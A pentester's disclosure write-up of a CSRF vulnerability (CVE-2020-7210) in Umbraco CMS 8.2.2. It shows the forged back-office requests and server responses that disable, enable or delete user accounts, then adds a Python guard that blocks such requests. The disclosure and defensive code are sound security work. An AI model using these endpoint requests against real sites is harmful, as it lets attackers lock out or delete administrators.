CSRF at Umbraco CMS

Cross-site request forgery can be used to make arbitrary web requests to the Umbraco CMS content management system on behalf of its users without their knowledge. Such an attack always requires user interaction, but as a rule it is enough for the victim to follow a specially prepared link or to visit a web page under the attacker's control. This makes it possible to activate, deactivate or completely delete user accounts, which creates a risk of a denial-of-service attack against those accounts.


Background

During a penetration test of a small web resource, a CSRF vulnerability was found in what was at that time the current version of Umbraco CMS. It allowed user accounts, including those with administrative privileges, to be activated, deactivated or deleted outright.

Although CSRF vulnerabilities dropped out of the ten most critical categories in the latest OWASP Top Ten 2017 report, it is too early to discount them.

The vulnerability was tested on version 8.2.2; in version 8.5 it has already been fixed, but it is possible that other versions prior to 8.5 remain vulnerable. Users of this product are strongly recommended to upgrade immediately to the latest available version.

Proof of concept

In a real attack, the following HTML document would be hosted on a malicious website controlled by the attacker.

Example 1: HTML to disable a user


A request that is sent to the server on behalf of the victim:

POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1
Host: 
[...]
Cookie: 

The response received from the server:

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: 
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"}

Example 2: HTML to enable a user


Request:

POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1
Host: 
[...]
Cookie: 

Response:

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"}

Example 3: HTML to delete a user


Request:

POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1
Host: 
[...]
Cookie: 

Response:

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: 
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User  was deleted","message":"","type":3}],"message":"User  was deleted"}

The victim's browser receives the server's response in JSON format (shown as a screenshot in the original post).

As soon as an authenticated victim (an administrator) visits a web page with the malicious HTML embedded, the active content executes in the context of the victim's session. Although the responses to these requests are not delivered to the attacker, in many cases this is enough to compromise the integrity of the victim's data stored on the site, or to issue potentially compromising requests to other sites.
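The root cause visible in the requests above is that the back-office endpoints accept a POST that is authenticated by the session cookie alone, which the browser attaches automatically. As an added example (not Umbraco's own code, and not a description of how the vendor's fix is implemented), the following Python guard shows the two defences a back-office API needs against this class of request: an Origin/Referer check and a per-session synchronizer token compared in constant time. The site origin, the header name `x-csrf-token`, the cookie value and the sample requests are constructed for illustration; only the three endpoint paths are taken from the requests shown in this post.

```python
"""
Added example, not Umbraco's code: a server-side CSRF guard for the
state-changing back-office requests shown in the advisory. A forged
cross-site POST that carries only the victim's session cookie is
rejected by both an origin check and a synchronizer-token check.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://cms.example.test"   # assumed origin of the Umbraco site
TOKEN_HEADER = "x-csrf-token"              # assumed name of the anti-forgery header

# Endpoint paths named in the advisory; only POSTs to these are guarded here.
USER_ENDPOINTS = (
    "/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers",
    "/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers",
    "/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser",
)


@dataclass
class Request:
    method: str
    path: str                                               # path incl. query string
    headers: Dict[str, str] = field(default_factory=dict)  # lower-case header names
    session_token: Optional[str] = None                     # token held server-side in the session


def _origin_of(url: str) -> Optional[str]:
    """Reduce a URL to scheme://host[:port]; None if the URL is not absolute."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def is_protected(req: Request) -> bool:
    return req.method.upper() == "POST" and req.path.split("?", 1)[0] in USER_ENDPOINTS


def check_origin(req: Request) -> Tuple[bool, str]:
    """Origin header first, Referer as fallback; neither present -> reject."""
    origin = req.headers.get("origin")
    if origin is not None:
        if origin.lower() == "null":            # sandboxed or data: page, opaque origin
            return False, "opaque Origin 'null'"
        return _origin_of(origin) == SITE_ORIGIN, f"Origin {origin}"
    referer = req.headers.get("referer")
    if referer is not None:
        return _origin_of(referer) == SITE_ORIGIN, f"Referer {referer}"
    return False, "no Origin or Referer on a state-changing request"


def check_token(req: Request) -> Tuple[bool, str]:
    """Synchronizer token: the value sent in a custom header must equal the session's."""
    sent = req.headers.get(TOKEN_HEADER)
    if not sent or not req.session_token:
        return False, "anti-forgery token missing"
    # constant-time comparison: a plain == would leak the matched prefix length via timing
    return hmac.compare_digest(sent.encode(), req.session_token.encode()), "token checked"


def decide(req: Request) -> Tuple[bool, List[str]]:
    """Allow only if both the origin check and the token check pass."""
    if not is_protected(req):
        return True, ["not a guarded request"]
    ok_origin, why_o = check_origin(req)
    ok_token, why_t = check_token(req)
    reasons = [f"{'pass' if ok_origin else 'FAIL'} origin: {why_o}",
               f"{'pass' if ok_token else 'FAIL'} token: {why_t}"]
    return ok_origin and ok_token, reasons


def new_token() -> str:
    return secrets.token_urlsafe(32)


# Constructed sample traffic (placeholder user id, cookie value and origins).
SESSION_TOKEN = new_token()
DISABLE = "/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=5"
SAMPLES = {
    # shape of the advisory's PoC request: the browser attaches the session cookie, nothing else
    "forged_from_attacker_page": Request("POST", DISABLE,
        {"origin": "https://attacker.example", "cookie": "session=placeholder"}, SESSION_TOKEN),
    "forged_referer_only": Request("POST", DISABLE,
        {"referer": "https://attacker.example/page.html", "cookie": "session=placeholder"}, SESSION_TOKEN),
    "forged_headers_stripped": Request("POST", DISABLE,
        {"cookie": "session=placeholder"}, SESSION_TOKEN),
    "same_origin_stale_token": Request("POST", DISABLE,
        {"origin": SITE_ORIGIN, TOKEN_HEADER: new_token()}, SESSION_TOKEN),
    "legitimate_backoffice": Request("POST", DISABLE,
        {"origin": SITE_ORIGIN, TOKEN_HEADER: SESSION_TOKEN}, SESSION_TOKEN),
    "plain_page_view": Request("GET", "/umbraco/", {"origin": "https://attacker.example"}),
}


def run_samples() -> Dict[str, bool]:
    return {name: decide(req)[0] for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, req in SAMPLES.items():
        allowed, reasons = decide(req)
        print(f"{name:28} {'ALLOW' if allowed else 'BLOCK'}  {'; '.join(reasons)}")
```

Two design points matter here. The guard fails closed when neither Origin nor Referer is present, because a state-changing back-office call from the real front end will always carry at least one of them, while a request with both stripped is exactly what a forged or proxied submission looks like. And the token check is kept independent of the origin check: the `same_origin_stale_token` sample passes the origin test but is still blocked, so a mistake in one layer does not reopen the hole.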

Instead of a conclusion

Although attacks have recently been shifting more and more from the client side to the server side, client-side attacks still deserve due attention. After discussing it with the client, we quickly contacted the vendor of the software product and received information about the fix. The vulnerability was assigned the identifier CVE-2020-7210. I admit that, for me as a pentester, this is the first vulnerability to receive a CVE identifier.
